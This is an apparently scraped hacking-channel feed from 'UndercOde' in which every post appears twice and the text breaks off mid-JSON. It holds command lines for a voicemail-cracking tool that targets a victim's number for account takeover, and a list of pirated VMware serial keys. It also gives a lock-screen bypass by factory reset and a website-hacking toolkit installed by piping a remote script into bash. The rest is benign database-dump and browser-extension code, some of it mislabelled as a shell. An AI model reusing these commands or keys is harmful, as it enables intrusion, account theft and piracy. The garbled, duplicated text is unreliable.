β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ HACK WEBSITES UPDATED 2020-ROOT TERMUX-LINUX
instagram.com/UndercOdeTestingCompany
π¦ Features :
Information Gathering:
Nmap
Setoolkit
Host To IP
WPScan
CMS Scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
Reaver
Pixiewps
Bluetooth Honeypot
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
Commix
FTP Auto Bypass
JBoss Autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
Ports Scan (common ports)
Get server Info
π¦Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
π¦ πβπππΈπππππΈπππβ & βπβ:
for termux - linux :
> bash <(wget -qO- https://git.io/vAtmB)
for more https://github.com/Manisso/fsociety
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ HACK WEBSITES UPDATED 2020-ROOT TERMUX-LINUX
instagram.com/UndercOdeTestingCompany
π¦ Features :
Information Gathering:
Nmap
Setoolkit
Host To IP
WPScan
CMS Scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
Reaver
Pixiewps
Bluetooth Honeypot
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
Commix
FTP Auto Bypass
JBoss Autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
Ports Scan (common ports)
Get server Info
π¦Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
π¦ πβπππΈπππππΈπππβ & βπβ:
for termux - linux :
> bash <(wget -qO- https://git.io/vAtmB)
for more https://github.com/Manisso/fsociety
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Manisso/fsociety: fsociety Hacking Tools Pack β A Penetration Testing Framework
fsociety Hacking Tools Pack β A Penetration Testing Framework - Manisso/fsociety
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Php Dumper shell script example :
http://pinterest.com/UndercOdeOfficial
<?php
use Ifsnop\Mysqldump as IMysqldump;
try {
$dump = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
} catch (\Exception $e) {
echo 'mysqldump-php error: ' . $e->getMessage();
}
Plain old PHP:
<?php
include_once(dirname(FILE) . '/mysqldump-php-2.0.0/src/Ifsnop/Mysqldump/Mysqldump.php');
$dump = new Ifsnop\Mysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
π¦ Changing values when exporting
You can register a callable that will be used to transform values during the export. An example use-case for this is removing sensitive data from database dumps:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTransformTableRowHook(function ($tableName, array $row) {
if ($tableName === 'customers') {
$row['social_security_number'] = (string) rand(1000000, 9999999);
}
return $row;
});
$dumper->start('storage/work/dump.sql');
π¦Table specific export limits
You can register table specific 'limits' to limit the returned rows on a per table basis:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTableLimits(array(
'users' => 300,
'logs' => 50,
'posts' => 10
));
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Php Dumper shell script example :
http://pinterest.com/UndercOdeOfficial
<?php
use Ifsnop\Mysqldump as IMysqldump;
try {
$dump = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
} catch (\Exception $e) {
echo 'mysqldump-php error: ' . $e->getMessage();
}
Plain old PHP:
<?php
include_once(dirname(FILE) . '/mysqldump-php-2.0.0/src/Ifsnop/Mysqldump/Mysqldump.php');
$dump = new Ifsnop\Mysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
π¦ Changing values when exporting
You can register a callable that will be used to transform values during the export. An example use-case for this is removing sensitive data from database dumps:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTransformTableRowHook(function ($tableName, array $row) {
if ($tableName === 'customers') {
$row['social_security_number'] = (string) rand(1000000, 9999999);
}
return $row;
});
$dumper->start('storage/work/dump.sql');
π¦Table specific export limits
You can register table specific 'limits' to limit the returned rows on a per table basis:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTableLimits(array(
'users' => 300,
'logs' => 50,
'posts' => 10
));
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Dump sql 2020 code :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Constructor and default parameters
/**
* Constructor of Mysqldump. Note that in the case of an SQLite database
* connection, the filename must be in the $db parameter.
*
* @param string $dsn PDO DSN connection string
* @param string $user SQL account username
* @param string $pass SQL account password
* @param array $dumpSettings SQL database settings
* @param array $pdoSettings PDO configured attributes
*/
public function __construct(
$dsn = '',
$user = '',
$pass = '',
$dumpSettings = array(),
$pdoSettings = array()
)
$dumpSettingsDefault = array(
'include-tables' => array(),
'exclude-tables' => array(),
'compress' => Mysqldump::NONE,
'init_commands' => array(),
'no-data' => array(),
'reset-auto-increment' => false,
'add-drop-database' => false,
'add-drop-table' => false,
'add-drop-trigger' => true,
'add-locks' => true,
'complete-insert' => false,
'databases' => false,
'default-character-set' => Mysqldump::UTF8,
'disable-keys' => true,
'extended-insert' => true,
'events' => false,
'hex-blob' => true, /* faster than escaped content */
'insert-ignore' => false,
'net_buffer_length' => self::MAXLINESIZE,
'no-autocommit' => true,
'no-create-info' => false,
'lock-tables' => true,
'routines' => false,
'single-transaction' => true,
'skip-triggers' => false,
'skip-tz-utc' => false,
'skip-comments' => false,
'skip-dump-date' => false,
'skip-definer' => false,
'where' => '',
/* deprecated */
'disable-foreign-keys-check' => true
);
$pdoSettingsDefaults = array(
PDO::ATTR_PERSISTENT => true,
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::MYSQL_ATTR_USE_BUFFERED_QUERY => false
);
// missing settings in constructor will be replaced by default options
$this->_pdoSettings = self::array_replace_recursive($pdoSettingsDefault, $pdoSettings);
$this->_dumpSettings = self::array_replace_recursive($dumpSettingsDefault, $dumpSettings);
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Dump sql 2020 code :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Constructor and default parameters
/**
* Constructor of Mysqldump. Note that in the case of an SQLite database
* connection, the filename must be in the $db parameter.
*
* @param string $dsn PDO DSN connection string
* @param string $user SQL account username
* @param string $pass SQL account password
* @param array $dumpSettings SQL database settings
* @param array $pdoSettings PDO configured attributes
*/
public function __construct(
$dsn = '',
$user = '',
$pass = '',
$dumpSettings = array(),
$pdoSettings = array()
)
$dumpSettingsDefault = array(
'include-tables' => array(),
'exclude-tables' => array(),
'compress' => Mysqldump::NONE,
'init_commands' => array(),
'no-data' => array(),
'reset-auto-increment' => false,
'add-drop-database' => false,
'add-drop-table' => false,
'add-drop-trigger' => true,
'add-locks' => true,
'complete-insert' => false,
'databases' => false,
'default-character-set' => Mysqldump::UTF8,
'disable-keys' => true,
'extended-insert' => true,
'events' => false,
'hex-blob' => true, /* faster than escaped content */
'insert-ignore' => false,
'net_buffer_length' => self::MAXLINESIZE,
'no-autocommit' => true,
'no-create-info' => false,
'lock-tables' => true,
'routines' => false,
'single-transaction' => true,
'skip-triggers' => false,
'skip-tz-utc' => false,
'skip-comments' => false,
'skip-dump-date' => false,
'skip-definer' => false,
'where' => '',
/* deprecated */
'disable-foreign-keys-check' => true
);
$pdoSettingsDefaults = array(
PDO::ATTR_PERSISTENT => true,
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::MYSQL_ATTR_USE_BUFFERED_QUERY => false
);
// missing settings in constructor will be replaced by default options
$this->_pdoSettings = self::array_replace_recursive($pdoSettingsDefault, $pdoSettings);
$this->_dumpSettings = self::array_replace_recursive($dumpSettingsDefault, $dumpSettings);
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chromoe extension full part 1 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) manifest.json
The manifest.json file tells Chrome important information about your extension, like its name and which permissions it needs.
The most basic possible extension is a directory with a manifest.json file. Letβs create a directory and put the following JSON into manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1"
}
Thatβs the most basic possible manifest.json, with all required fields filled in. The manifest_version should always be 2, because version 1 is unsupported as of January 2014. So far our extension does absolutely nothing, but letβs load it into Chrome anyway.
2) Load your extension into Chrome
To load your extension in Chrome, open up chrome://extensions/ in your browser and click βDeveloper modeβ in the top right. Now click βLoad unpacked extensionβ¦β and select the extensionβs directory. You should now see your extension in the list.
3) When you change or add code in your extension, just come back to this page and reload the page. Chrome will reload your extension.
π¦Content scripts
A content script is βa JavaScript file that runs in the context of web pages.β This means that a content script can interact with web pages that the browser visits. Not every JavaScript file in a Chrome extension can do this; weβll see why later.
1) Letβs add a content script named content.js:
// content.js
alert("Hello from your Chrome extension!")
To inject the script, we need to tell our manifest.json file about it.
2) Add this to your manifest.json file:
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["content.js"]
}
]
3) This tells Chrome to inject content.js into every page we visit using the special <all_urls> URL pattern. If we want to inject the script on only some pages, we can use match patterns. Here are a few examples of values for "matches":
["https://mail.google.com/*", "http://mail.google.com/*"] injects our script into HTTPS and HTTP Gmail. If we have / at the end instead of /*, it matches the URLs exactly, and so would only inject into https://mail.google.com/, not https://mail.google.com/mail/u/0/#inbox. Usually that isnβt what you want.
http://*/* will match any http URL, but no other scheme. For example, this wonβt inject your script into https sites.
4) Reload your Chrome extension. Every single page you visit now pops up an alert. Letβs log the first URL on the page instead.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chromoe extension full part 1 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) manifest.json
The manifest.json file tells Chrome important information about your extension, like its name and which permissions it needs.
The most basic possible extension is a directory with a manifest.json file. Letβs create a directory and put the following JSON into manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1"
}
Thatβs the most basic possible manifest.json, with all required fields filled in. The manifest_version should always be 2, because version 1 is unsupported as of January 2014. So far our extension does absolutely nothing, but letβs load it into Chrome anyway.
2) Load your extension into Chrome
To load your extension in Chrome, open up chrome://extensions/ in your browser and click βDeveloper modeβ in the top right. Now click βLoad unpacked extensionβ¦β and select the extensionβs directory. You should now see your extension in the list.
3) When you change or add code in your extension, just come back to this page and reload the page. Chrome will reload your extension.
π¦Content scripts
A content script is βa JavaScript file that runs in the context of web pages.β This means that a content script can interact with web pages that the browser visits. Not every JavaScript file in a Chrome extension can do this; weβll see why later.
1) Letβs add a content script named content.js:
// content.js
alert("Hello from your Chrome extension!")
To inject the script, we need to tell our manifest.json file about it.
2) Add this to your manifest.json file:
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["content.js"]
}
]
3) This tells Chrome to inject content.js into every page we visit using the special <all_urls> URL pattern. If we want to inject the script on only some pages, we can use match patterns. Here are a few examples of values for "matches":
["https://mail.google.com/*", "http://mail.google.com/*"] injects our script into HTTPS and HTTP Gmail. If we have / at the end instead of /*, it matches the URLs exactly, and so would only inject into https://mail.google.com/, not https://mail.google.com/mail/u/0/#inbox. Usually that isnβt what you want.
http://*/* will match any http URL, but no other scheme. For example, this wonβt inject your script into https sites.
4) Reload your Chrome extension. Every single page you visit now pops up an alert. Letβs log the first URL on the page instead.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 2 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Logging the URL
jQuery isnβt necessary, but it makes everything easier. First, download a version of jQuery from the jQuery CDN and put it in your extensionβs folder. I downloaded the latest minified version, jquery-2.1.3.min.js. To load it, add it to manifest.json before "content.js". Your whole manifest.json should look like this:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
]
}
2) Now that we have jQuery, letβs use it to log the URL of the first external link on the page in content.js:
// content.js
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
Note that we donβt need to use jQuery to check if the document has loaded. By default, Chrome injects content scripts after the DOM is complete.
3) Try it out - you should see the output in your console on every page you visit.
4) Browser Actions
When an extension adds a little icon next to your address bar, thatβs a browser action. Your extension can listen for clicks on that button and then do something.
5) Put the icon.png from Googleβs extension tutorial in your extension folder and add this to manifest.json:
"browser_action": {
"default_icon": "icon.png"
}
6) In order to use the browser action, we need to add message passing.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 2 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Logging the URL
jQuery isnβt necessary, but it makes everything easier. First, download a version of jQuery from the jQuery CDN and put it in your extensionβs folder. I downloaded the latest minified version, jquery-2.1.3.min.js. To load it, add it to manifest.json before "content.js". Your whole manifest.json should look like this:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
]
}
2) Now that we have jQuery, letβs use it to log the URL of the first external link on the page in content.js:
// content.js
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
Note that we donβt need to use jQuery to check if the document has loaded. By default, Chrome injects content scripts after the DOM is complete.
3) Try it out - you should see the output in your console on every page you visit.
4) Browser Actions
When an extension adds a little icon next to your address bar, thatβs a browser action. Your extension can listen for clicks on that button and then do something.
5) Put the icon.png from Googleβs extension tutorial in your extension folder and add this to manifest.json:
"browser_action": {
"default_icon": "icon.png"
}
6) In order to use the browser action, we need to add message passing.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 3 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Message passing
1) A content script has access to the current page, but is limited in the APIs it can access. For example, it cannot listen for clicks on the browser action. We need to add a different type of script to our extension, a background script, which has access to every Chrome API but cannot access the current page. As Google puts it:
2) Content scripts have some limitations. They cannot use chrome.* APIs, with the exception of extension, i18n, runtime, and storage.
3) So the content script will be able to pull a URL out of the current page, but will need to hand that URL over to the background script to do something useful with it. In order to communicate, weβll use what Google calls message passing, which allows scripts to send and listen for messages. It is the only way for content scripts and background scripts to interact.
4) Add the following to tell manifest.json about the background script:
"background": {
"scripts": ["background.js"]
}
Now weβll add background.js:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
5) This sends an arbitrary JSON payload to the current tab. The keys of the JSON payload can be anything, but I chose "message" for simplicity. Now we need to listen for that message in content.js:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
}
}
);
6) Notice that all of our previous code has been moved into the listener, so that it is only run when the payload is received. Every time you click the browser action icon, you should see a URL get logged to the console. If itβs not working, try reloading the extension and then reloading the page.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 3 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Message passing
1) A content script has access to the current page, but is limited in the APIs it can access. For example, it cannot listen for clicks on the browser action. We need to add a different type of script to our extension, a background script, which has access to every Chrome API but cannot access the current page. As Google puts it:
2) Content scripts have some limitations. They cannot use chrome.* APIs, with the exception of extension, i18n, runtime, and storage.
3) So the content script will be able to pull a URL out of the current page, but will need to hand that URL over to the background script to do something useful with it. In order to communicate, weβll use what Google calls message passing, which allows scripts to send and listen for messages. It is the only way for content scripts and background scripts to interact.
4) Add the following to tell manifest.json about the background script:
"background": {
"scripts": ["background.js"]
}
Now weβll add background.js:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
5) This sends an arbitrary JSON payload to the current tab. The keys of the JSON payload can be anything, but I chose "message" for simplicity. Now we need to listen for that message in content.js:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
}
}
);
6) Notice that all of our previous code has been moved into the listener, so that it is only run when the payload is received. Every time you click the browser action icon, you should see a URL get logged to the console. If itβs not working, try reloading the extension and then reloading the page.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 4-final :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Opening a new tab
We can use the chrome.tabs API to open a new tab:
chrome.tabs.create({"url": "http://google.com"});
But chrome.tabs can only be used by background.js, so weβll have to add some more message passing since background.js can open the tab, but canβt grab the URL. Hereβs the idea:
2) Listen for a click on the browser action in background.js. When itβs clicked, send a clicked_browser_action event to content.js.
When content.js receives the event, it grabs the URL of the first link on the page. Then it sends open_new_tab back to background.js with the URL to open.
background.js listens for open_new_tab and opens a new tab with the given URL when it receives the message.
3) Clicking on the browser action will trigger background.js, which will send a message to content.js, which will send a URL back to background.js, which will open a new tab with the given URL.
4) First, we need to tell content.js to send the URL to background.js. Change content.js to use this code:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
// This line is new!
chrome.runtime.sendMessage({"message": "open_new_tab", "url": firstHref});
}
}
);
5) Now we need to add some code to tell background.js to listen for that event:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
// This block is new!
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "open_new_tab" ) {
chrome.tabs.create({"url": request.url});
}
}
);
6) Now when you click on the browser action icon, it opens a new tab with the first external URL on the page.
π¦ Wrapping it up
The full content.js and background.js are above. Hereβs the full manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"background": {
"scripts": ["background.js"]
},
"content_scripts": [
{
"matches": [
"<all_urls>"
],
